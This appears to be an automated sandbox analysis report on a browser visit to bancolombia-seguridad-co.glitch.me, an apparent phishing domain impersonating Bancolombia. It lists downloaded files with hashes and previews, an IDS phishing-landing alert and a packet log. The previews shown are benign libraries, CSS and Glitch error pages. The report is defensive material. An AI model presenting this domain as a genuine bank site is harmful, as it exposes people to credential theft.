                                                                                                                          SSDEEP:768:oHzaMKHBCwsZtisP5XqYofL+qviHOlTjdNoVJDe6VyKaqgYUD0ZTTE8yVfZsk:caMKH125hYiM8O9dNoVJ3N48yVL
                                                                                                                          MD5:575B5480531DA4D14E7453E2016FE0BC
                                                                                                                          SHA1:E5C5F3134FE29E60B591C87EA85951F0AEA36EE1
                                                                                                                          SHA-256:DE36E50194320A7D3EF1ACE9BD34A875A8BD458B253C061979DD628E9BF49AFD
                                                                                                                          SHA-512:174E48F4FB2A7E7A0BE1E16564F9ED2D0BBCC8B4AF18CB89AD49CF42B1C3894C8F8E29CE673BC5D9BC8552F88D1D47294EE0E216402566A3F446F04ACA24857A
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://www.google-analytics.com/analytics.js
                                                                                                                          Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var n=this||self,p=function(a,b){a=a.split(".");var c=n;a[0]in c||"undefined"==typeof c.execScript||c.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)a.length||void 0===b?c=c[d]&&c[d]!==Object.prototype[d]?c[d]:c[d]={}:c[d]=b};function q(){for(var a=r,b={},c=0;c<a.length;++c)b[a[c]]=c;return b}function u(){var a="ABCDEFGHIJKLMNOPQRSTUVWXYZ";a+=a.toLowerCase()+"0123456789-_";return a+"."}var r,v;.function aa(a){function b(k){for(;d<a.length;){var m=a.charAt(d++),l=v[m];if(null!=l)return l;if(!/^[\s\xa0]*$/.test(m))throw Error("Unknown base64 encoding at char: "+m);}return k}r=r||u();v=v||q();for(var c="",d=0;;){var e=b(-1),f=b(0),h=b(64),g=b(64);if(64===g&&-1===e)return c;c+=String.fromCharCode(e<<2|f>>4);64!=h&&(c+=String.fromCharCode(f<<4&240|h>>2),64!=g&&(c+=String.fromCharCode(h<<6&192|g)))}};var w={},y=function(a){w.TAGGING=w.TAGGING||[];w.TAGGING[a]=!0};var ba=Array.isArray,c
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=6, manufacturer=BeFunky, orientation=upper-left, xresolution=94, yresolution=102, resolutionunit=2, software=BeFunky Photo Editor], baseline, precision 8, 2000x1000, components 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):648805
                                                                                                                          Entropy (8bit):7.96213102451655
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12288:myqCa+rpH5NeZsLKD8WdD/7Deyitgw0OHofIMlyiUeVMIiwHfShWg:nqCbFGdD/76yiZ0+CyCVhaog
                                                                                                                          MD5:35F3240B61143E838EFDE4C3B19132C5
                                                                                                                          SHA1:350771D41668D49B95AE60216CDBDF4B58DBD21E
                                                                                                                          SHA-256:7C5FD41E76E8AE819B6AFA31F1F42B9896C4D49C145D7B5E7514B62C81E11080
                                                                                                                          SHA-512:D37E57722EF93D26D733A53C039305389520DDCDAE19B4EC4EF79D418728E91E546AE173417CDB15FA903DAA47CAA026A476151DA0476B5CB0C9346C1478BEB5
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:......Exif..MM.*.................V.......................^...........f.(...........1.........n....BeFunky....,.......,....BeFunky Photo Editor.....JFIF.....,.,.....C....................................................................C........................................................................................................................n................+........!1.AQ.."a..q.....2....#B..R..$3brv....6C...%48Scw....9Tx...5DFUfg..&7d....Ghstu........................................c......................!..1A.Qa."q..........2.BR..#b.36ru...$Cv.....STc...457..%Des.....Udt.&.................?..:............z....E',k3PT....|..O.S....}dr..YI....&....6'}R..m...(....?.M...|~...d{...R..3...?u;t...........+.....B...t..2.f$..~_..-D.$D........k.Lm.>.qDU.....1..f..71..F....*....M...\..o.#m...[.o2.JgI.~g..J. ..N...$t1Ea.H.aH.A....A..%..I...#.w...!...k.-A....=t.../...s...UQU(.......o..EJ.c1.E.iDU...'~..$8...&>JZ+...x.'w....p."b...@~C...!..&|b.....?0h.....\Lx.Qk.I...
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:HTML document, ASCII text
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):3674
                                                                                                                          Entropy (8bit):4.699432903511224
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2PV6qmryH65Um4d2BQwmfX6cmFFp/fG6wJXqXAh4RNTakVvAsuDD5tSIrPdffMJK:Y16eEBm/6lFF5f9wJXiAh4RN8DrSSJj1
                                                                                                                          MD5:CE0366D3C0EF2D5187EFC621C5E7FB00
                                                                                                                          SHA1:83F60D035E88968D24178360639A8AD6CC08DC26
                                                                                                                          SHA-256:2784F6FFEFBD5FCAE302D112E1629907DEED1E36F9C2050EA6D7038EEC3F649C
                                                                                                                          SHA-512:375FD32E21278257B71F412ED4AC68B0C307C2FACB08F06A84DBF38EB50F6714ECBC29877868B871348924641C75A8A0D471510D1C0C1D9B2C5A423CD92E2628
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:http://bancolombia-seguridad-co.glitch.me/css/font/CIBFontSans-Light.ttf
                                                                                                                          Preview:<!DOCTYPE html>.<html lang="en">. <head>. <meta charset="utf-8">. <title>Well, you found a glitch.</title>. <meta name="viewport" content="initial-scale=1, width=device-width">. <link rel="stylesheet" type="text/css" href="https://cloud.webtype.com/css/3a8e55c6-b1f3-4659-99eb-125ae72bd084.css">. <style>. * {. box-sizing: border-box;. }.. html, body {. margin: 0;. padding: 0;. font-family: "Benton Sans", Helvetica, Sans-serif;. font-size: 16px;. line-height: 160%;. width: 100%;. height: 100%;. }.. .container {. width: 100%;. height: 100%;. display: flex;. padding: 100px;. }.. .info {. max-width: 370px;. z-index: 1;. position: relative;. }.. h1 {. margin: 0;. font-size: 40px;. line-height: 130%;. font-weight: bold;. }.. a {. color: #000;. }.. .decorative-image {.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:HTML document, ASCII text
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):3674
                                                                                                                          Entropy (8bit):4.699432903511224
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2PV6qmryH65Um4d2BQwmfX6cmFFp/fG6wJXqXAh4RNTakVvAsuDD5tSIrPdffMJK:Y16eEBm/6lFF5f9wJXiAh4RN8DrSSJj1
                                                                                                                          MD5:CE0366D3C0EF2D5187EFC621C5E7FB00
                                                                                                                          SHA1:83F60D035E88968D24178360639A8AD6CC08DC26
                                                                                                                          SHA-256:2784F6FFEFBD5FCAE302D112E1629907DEED1E36F9C2050EA6D7038EEC3F649C
                                                                                                                          SHA-512:375FD32E21278257B71F412ED4AC68B0C307C2FACB08F06A84DBF38EB50F6714ECBC29877868B871348924641C75A8A0D471510D1C0C1D9B2C5A423CD92E2628
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:http://bancolombia-seguridad-co.glitch.me/favicon.ico
                                                                                                                          Preview:<!DOCTYPE html>.<html lang="en">. <head>. <meta charset="utf-8">. <title>Well, you found a glitch.</title>. <meta name="viewport" content="initial-scale=1, width=device-width">. <link rel="stylesheet" type="text/css" href="https://cloud.webtype.com/css/3a8e55c6-b1f3-4659-99eb-125ae72bd084.css">. <style>. * {. box-sizing: border-box;. }.. html, body {. margin: 0;. padding: 0;. font-family: "Benton Sans", Helvetica, Sans-serif;. font-size: 16px;. line-height: 160%;. width: 100%;. height: 100%;. }.. .container {. width: 100%;. height: 100%;. display: flex;. padding: 100px;. }.. .info {. max-width: 370px;. z-index: 1;. position: relative;. }.. h1 {. margin: 0;. font-size: 40px;. line-height: 130%;. font-weight: bold;. }.. a {. color: #000;. }.. .decorative-image {.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):160
                                                                                                                          Entropy (8bit):5.265198425112053
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:U3yGqItEsRGD0twQyGnyaDgeDQggp6ngQjMHz6lz+HJ/KpRf:U3yGqIt7DtwjGnyac8gUMT6lQSpl
                                                                                                                          MD5:CEEE564F54E512A948F918E2710EAB6E
                                                                                                                          SHA1:74BF8C9C2A34A232E829497C35F1B0D1D55D1A12
                                                                                                                          SHA-256:D60C833406C5CCA9095B3CABD40D6F65E486A0A4C0B59105031C9A6E94595F5A
                                                                                                                          SHA-512:D186703897E8A19529CCC43918A8F5AE4E41DEC145F17ED2658243C3CBAE45A62C8F28268532513F05C43E1D7B89EB8C4A5891BF88547F2559299543E6CDA211
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://rules.quantcount.com/rules-p-d5x2uDVHd7ALE.js
                                                                                                                          Preview:/*. Quantcast measurement tag. Copyright (c) 2008-2022, Quantcast Corp..*/.'use strict';(function(a,b,c){__qc("rules",[a])})("p-d5x2uDVHd7ALE",window,document);
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (23843), with escape sequences
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):23930
                                                                                                                          Entropy (8bit):5.42714919475621
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:EqR7eZk8qlPRy4+TWLc2dImKhHQRv9t6A2s7/vINwMViTnGTBKKsomM8LKrY:ENZkblPMud716VKwwIiOKDkDY
                                                                                                                          MD5:1CFFDD5C82CD0AFF2F453D352EA5903A
                                                                                                                          SHA1:1BA286119EEEC53D6C99E2ED640D75EBD467B244
                                                                                                                          SHA-256:20133CC700841EC85F087FF9834A922B482B9135E98574A9AFEBADE4C754558C
                                                                                                                          SHA-512:7A625952E55D00A0A8D6B8E075375D27A6AD81A01A615FE430C08FFC56CF62E2745EF09E102EAED4DB35C4A5EDFB439DB64986A11234C3DE70FA7C459214F599
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://secure.quantserve.com/quant.js
                                                                                                                          Preview:/* Copyright (c) 2008-2023, Quantcast Corp. https://www.quantcast.com/legal/license */.!function(){"use strict";var e="qcSes";function t(){var e=r();return"xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx".replace(/[xy]/g,(function(t){var n=(e+16*Math.random())%16|0;return e=Math.floor(e/16),("x"===t?n:3&n|8).toString(16)}))}var n=function(){try{if(!window.sessionStorage)return t()}catch(e){return t()}var n;try{if(n=window.sessionStorage.getItem(e))return n}catch(e){return t()}n=t();try{window.sessionStorage.setItem(e,n)}catch(e){}return n}();function r(){return(new Date).getTime()}function o(){return new Date}function a(e){var t=new Date(2e3,e,1,0,0,0,0),n=t.toUTCString(),r=new Date(n.substring(0,n.lastIndexOf(" ")-1));return t.getTime()-r.getTime()}function i(){return Math.round(2147483647*Math.random())}var c=/qcdbgc=1$/.test(window.location.toString());function u(e,t){if("undefined"!=typeof console){var n="ERROR"===e?".[41m QuantJS .[0m":".[44m QuantJS .[0m";console.log.apply(console,[n].conca
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):106499
                                                                                                                          Entropy (8bit):5.043563563124278
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:7+I3pmNVSeH6mYLPc5O3WzS8mrZfQ1kVyNHs2CPbFhPw7Ru0amQNqAuOVQbl7ScF:CR5sQ1cbFh0Ru0amQqOVw2m
                                                                                                                          MD5:973D8A8543E1E6170DE8F5BFC9D26C74
                                                                                                                          SHA1:014DEB5CDBAF7A6DE7F01975870B17162E170FEB
                                                                                                                          SHA-256:E841C0EFF016968A22DA08306E2AE72A57B548031F998311611554DE2E631F77
                                                                                                                          SHA-512:ACE051139147BD62B5E57D2662528FDB70619F6EA9BE091F728E41355A37FCA126AD5BB77C6E56C2D9FA937D31ECEDEFA3F65B25FC92A675D7A70E5811941431
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:http://bancolombia-seguridad-co.glitch.me/archivos/style.css
                                                                                                                          Preview:..@font-face {. font-family: "Arimo-bold";. src: url("../css/font/arimo-bold-webfont.eot");. /* IE9 Compat Modes */. src: url("../css/font/arimo-bold-webfont.eot"). format("embedded-opentype"),. url("../css/font/arimo-bold-webfont.woff"). format("woff"),. url("../css/font/arimo-bold-webfont.ttf"). format("truetype"),. url("../css/font/arimo-bold-webfont.svg"). format("svg");. /* Legacy iOS */. font-weight: normal;. font-style: normal;.}..@font-face {. font-family: "Arimo-italic";. src: url("../css/font/arimo-italic-webfont.eot");. /* IE9 Compat Modes */. src: url("../css/font/arimo-italic-webfont.eot"). format("embedded-opentype"),. url("../css/font/arimo-italic-webfont.woff2"). format("woff2"),. url("../style/font/arimo-italic-webfont.woff"). format("woff"),. url("../css/font/arimo-italic-webfont.ttf"). format("truetype"),. url("../img/arimo-italic-webfont.svg"). format("svg");. /* Legacy iOS */. font-weigh
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:HTML document, ASCII text
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):3674
                                                                                                                          Entropy (8bit):4.699432903511224
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2PV6qmryH65Um4d2BQwmfX6cmFFp/fG6wJXqXAh4RNTakVvAsuDD5tSIrPdffMJK:Y16eEBm/6lFF5f9wJXiAh4RN8DrSSJj1
                                                                                                                          MD5:CE0366D3C0EF2D5187EFC621C5E7FB00
                                                                                                                          SHA1:83F60D035E88968D24178360639A8AD6CC08DC26
                                                                                                                          SHA-256:2784F6FFEFBD5FCAE302D112E1629907DEED1E36F9C2050EA6D7038EEC3F649C
                                                                                                                          SHA-512:375FD32E21278257B71F412ED4AC68B0C307C2FACB08F06A84DBF38EB50F6714ECBC29877868B871348924641C75A8A0D471510D1C0C1D9B2C5A423CD92E2628
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:http://bancolombia-seguridad-co.glitch.me/css/font/OpenSans-Regular.ttf
                                                                                                                          Preview:<!DOCTYPE html>.<html lang="en">. <head>. <meta charset="utf-8">. <title>Well, you found a glitch.</title>. <meta name="viewport" content="initial-scale=1, width=device-width">. <link rel="stylesheet" type="text/css" href="https://cloud.webtype.com/css/3a8e55c6-b1f3-4659-99eb-125ae72bd084.css">. <style>. * {. box-sizing: border-box;. }.. html, body {. margin: 0;. padding: 0;. font-family: "Benton Sans", Helvetica, Sans-serif;. font-size: 16px;. line-height: 160%;. width: 100%;. height: 100%;. }.. .container {. width: 100%;. height: 100%;. display: flex;. padding: 100px;. }.. .info {. max-width: 370px;. z-index: 1;. position: relative;. }.. h1 {. margin: 0;. font-size: 40px;. line-height: 130%;. font-weight: bold;. }.. a {. color: #000;. }.. .decorative-image {.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (65451)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):89476
                                                                                                                          Entropy (8bit):5.2896589255084425
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:AjExXUqrnxDjoXEZxkMV4SYSt0zvDD6ip3h8cApwEjOPrBeU6QLiTFbc0QlQvakF:AYh8eip3huuf6IidlrvakdtQ47GK1
                                                                                                                          MD5:DC5E7F18C8D36AC1D3D4753A87C98D0A
                                                                                                                          SHA1:C8E1C8B386DC5B7A9184C763C88D19A346EB3342
                                                                                                                          SHA-256:F7F6A5894F1D19DDAD6FA392B2ECE2C5E578CBF7DA4EA805B6885EB6985B6E3D
                                                                                                                          SHA-512:6CB4F4426F559C06190DF97229C05A436820D21498350AC9F118A5625758435171418A022ED523BAE46E668F9F8EA871FEAB6AFF58AD2740B67A30F196D65516
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js
                                                                                                                          Preview:/*! jQuery v3.5.1 | (c) JS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"o
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:HTML document, ASCII text
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):3674
                                                                                                                          Entropy (8bit):4.699432903511224
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2PV6qmryH65Um4d2BQwmfX6cmFFp/fG6wJXqXAh4RNTakVvAsuDD5tSIrPdffMJK:Y16eEBm/6lFF5f9wJXiAh4RN8DrSSJj1
                                                                                                                          MD5:CE0366D3C0EF2D5187EFC621C5E7FB00
                                                                                                                          SHA1:83F60D035E88968D24178360639A8AD6CC08DC26
                                                                                                                          SHA-256:2784F6FFEFBD5FCAE302D112E1629907DEED1E36F9C2050EA6D7038EEC3F649C
                                                                                                                          SHA-512:375FD32E21278257B71F412ED4AC68B0C307C2FACB08F06A84DBF38EB50F6714ECBC29877868B871348924641C75A8A0D471510D1C0C1D9B2C5A423CD92E2628
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:http://bancolombia-seguridad-co.glitch.me/hhhhhh_files/footer.css
                                                                                                                          Preview:<!DOCTYPE html>.<html lang="en">. <head>. <meta charset="utf-8">. <title>Well, you found a glitch.</title>. <meta name="viewport" content="initial-scale=1, width=device-width">. <link rel="stylesheet" type="text/css" href="https://cloud.webtype.com/css/3a8e55c6-b1f3-4659-99eb-125ae72bd084.css">. <style>. * {. box-sizing: border-box;. }.. html, body {. margin: 0;. padding: 0;. font-family: "Benton Sans", Helvetica, Sans-serif;. font-size: 16px;. line-height: 160%;. width: 100%;. height: 100%;. }.. .container {. width: 100%;. height: 100%;. display: flex;. padding: 100px;. }.. .info {. max-width: 370px;. z-index: 1;. position: relative;. }.. h1 {. margin: 0;. font-size: 40px;. line-height: 130%;. font-weight: bold;. }.. a {. color: #000;. }.. .decorative-image {.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):8972
                                                                                                                          Entropy (8bit):4.73385933292565
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:fxqpFUXJbBbx3tobNFIMJF6kDfNaHwsMt7coRIAkcFqFoMud+IRYwEcFqFoMjbn0:f+FDF1OaFqFoZFFqFoypl23z
                                                                                                                          MD5:68C405521B0343DB0AB91346521FC35E
                                                                                                                          SHA1:03D394CDED247A91615ECFE7B2BD5F471E051382
                                                                                                                          SHA-256:5B722B5B661E2549D92A3A4A53B4579D01A75A7C18940C97AEAAA2D5ADB3FEA5
                                                                                                                          SHA-512:431CC7A5515A264492CE2F8256C195329F1474281DF1DAB533535656656291F56E60E9F5A9451E889315DDAB626074FF869315567E85991F54CE56D4B688475B
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:http://bancolombia-seguridad-co.glitch.me/nicepage.css
                                                                                                                          Preview:/*begin-commonstyles library*//*!. * froala_editor v4.0.6 (https://www.froala.com/wysiwyg-editor). * License https://froala.com/wysiwyg-editor/terms/. * Copyright 2014-2021 Froala Labs. */...fr-clearfix::after {. clear: both;. display: block;. content: "";. height: 0; }...fr-hide-by-clipping {. position: absolute;. width: 1px;. height: 1px;. padding: 0;. margin: -1px;. overflow: hidden;. clip: rect(0, 0, 0, 0);. border: 0; }...fr-view img.fr-rounded, .fr-view .fr-img-caption.fr-rounded img {. border-radius: 10px;. -moz-border-radius: 10px;. -webkit-border-radius: 10px;. -moz-background-clip: padding;. -webkit-background-clip: padding-box;. background-clip: padding-box; }...fr-view img.fr-shadow, .fr-view .fr-img-caption.fr-shadow img {. -webkit-box-shadow: 10px 10px 5px 0px #cccccc;. -moz-box-shadow: 10px 10px 5px 0px #cccccc;. box-shadow: 10px 10px 5px 0px #cccccc; }...fr-view img.fr-bordered, .fr-view .fr-img-caption.fr-bordered img {. border: solid 5px #CCC; }.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (3744)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):3921
                                                                                                                          Entropy (8bit):5.2597353282100645
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:eY2vqnPPmhKqYW6jbaaMuLK0wdlfiWA5SGFyi8vok4BDhxdJnlep2II:Hiqx2kGa6JddH8SGkf58DnXle4
                                                                                                                          MD5:9085D9901B359717DDB14E6F68003B29
                                                                                                                          SHA1:D72A83EEE42429199C70E71ED509F1243733ABA2
                                                                                                                          SHA-256:EA28A24264A92B604FD81CAEAC713520DC730C23D0BF08A45468839F264666F0
                                                                                                                          SHA-512:8D64A9A7823D51779555E76573504F74C300CEBDA320636C536FC8EB93F7DAD3FDBEA81C78A885E5ACD01B6541BCE3F80E3EF303252BE4C4B588F9AD0666C144
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:http://bancolombia-seguridad-co.glitch.me/Casa.css
                                                                                                                          Preview:.u-section-2 {. background-image: linear-gradient(0deg, rgba(0,0,0,0.55), rgba(0,0,0,0.55)),. url("data:image/svg+xml;base64,PHN2ZyB2ZXJzaW9uPSIxLjEiIGlkPSJkZWZhdWx0LWltYWdlLXNvbGlkIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHg9IjBweCIgeT0iMHB4IiB2aWV3Qm94PSIwIDAgNDAwIDI2NSIgc3R5bGU9IndpZHRoOiA0MDBweDsgaGVpZ2h0OiAyNjVweDsiPg0KPHJlY3QgZmlsbD0iI0M2RDhFMSIgd2lkdGg9IjQwMCIgaGVpZ2h0PSIyNjUiLz4NCjxwYXRoIGZpbGw9IiNEOUUzRTgiIGQ9Ik0zOTUuMyw5Ni4yYy01LTAuOC02LjEsMS4xLTguNSwyLjljLTEtMi4zLTIuNi02LjItNy43LTVjMS41LTUuMy0yLjYtOC40LTcuNy04LjRjLTAuNiwwLTEuMiwwLjEtMS44LDAuMg0KCWMtMS44LTQuMS02LTYuOS0xMC43LTYuOWMtNi41LDAtMTEuOCw1LjMtMTEuOCwxMS44YzAsMC40LDAsMC45LDAuMSwxLjNjLTEuMi0wLjgtMi41LTEuMy0zLjktMS4zYy00LjMsMC03LjksNC4yLTcuOSw5LjQNCgljMCwxLjIsMC4yLDIuNCwwLjYsMy41Yy0wLjUtMC4xLTEtMC4xLTEuNi0wLjFjLTYuOSwwLTEyLjUsNS41LTEyLjcsMTIuNGMtMC45LTAuMi0xLjktMC40LTIuOS0wLjRjLTYuNCwwLTExLjcsNS4yLTEyLjUsMTEuOA0KCWMtMS4yLTAuNC0yLjUtMC42LTMuOS0wLjZjLTUuOSwwLTEwLjgsMy44LTEyLjEsOC45Yy0yLjQtMi01LjUtMy4yLTguOS0zLjJjL
                                                                                                                          No static file info
                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                          2024-10-13T18:20:40.276273+02002027561ET PHISHING Generic Miarroba Phishing Landing23.219.195.7380192.168.2.449736TCP
                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                          Oct 13, 2024 18:20:38.166861057 CEST49675443192.168.2.4173.222.162.32
                                                                                                                          Oct 13, 2024 18:20:39.661326885 CEST4973580192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:39.661757946 CEST4973680192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:39.666224957 CEST80497353.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:39.666579008 CEST80497363.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:39.666682005 CEST4973580192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:39.666907072 CEST4973680192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:39.666907072 CEST4973680192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:39.672003984 CEST80497363.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.187155962 CEST80497363.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.187179089 CEST80497363.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.187194109 CEST80497363.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.187207937 CEST80497363.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.187223911 CEST80497363.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.187238932 CEST80497363.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.187252045 CEST4973680192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:40.187256098 CEST80497363.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.187271118 CEST80497363.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.187289000 CEST80497363.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.187319040 CEST4973680192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:40.187346935 CEST4973680192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:40.266834974 CEST4973780192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:40.267440081 CEST4973880192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:40.267750978 CEST4973980192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:40.268033028 CEST4974080192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:40.271516085 CEST4973680192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:40.271856070 CEST80497373.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.271897078 CEST4973580192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:40.271941900 CEST4973780192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:40.272362947 CEST80497383.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.272433996 CEST4973880192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:40.272656918 CEST80497393.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.272726059 CEST4973980192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:40.273504972 CEST80497403.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.273576975 CEST4974080192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:40.276273012 CEST80497363.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.276736975 CEST80497353.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.277024984 CEST4973780192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:40.277116060 CEST4973880192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:40.277348042 CEST4973980192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:40.277580976 CEST4974080192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:40.282110929 CEST80497373.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.282129049 CEST80497383.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.282141924 CEST80497393.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.282510042 CEST80497403.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.399987936 CEST80497363.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.400010109 CEST80497363.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.400027990 CEST80497363.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.400042057 CEST80497363.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.400120020 CEST4973680192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:40.400176048 CEST4973680192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:40.402494907 CEST4973680192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:40.403245926 CEST80497353.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.403343916 CEST80497353.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.403369904 CEST80497353.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.403390884 CEST80497353.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.403410912 CEST4973580192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:40.403505087 CEST4973580192.168.2.43.219.195.73
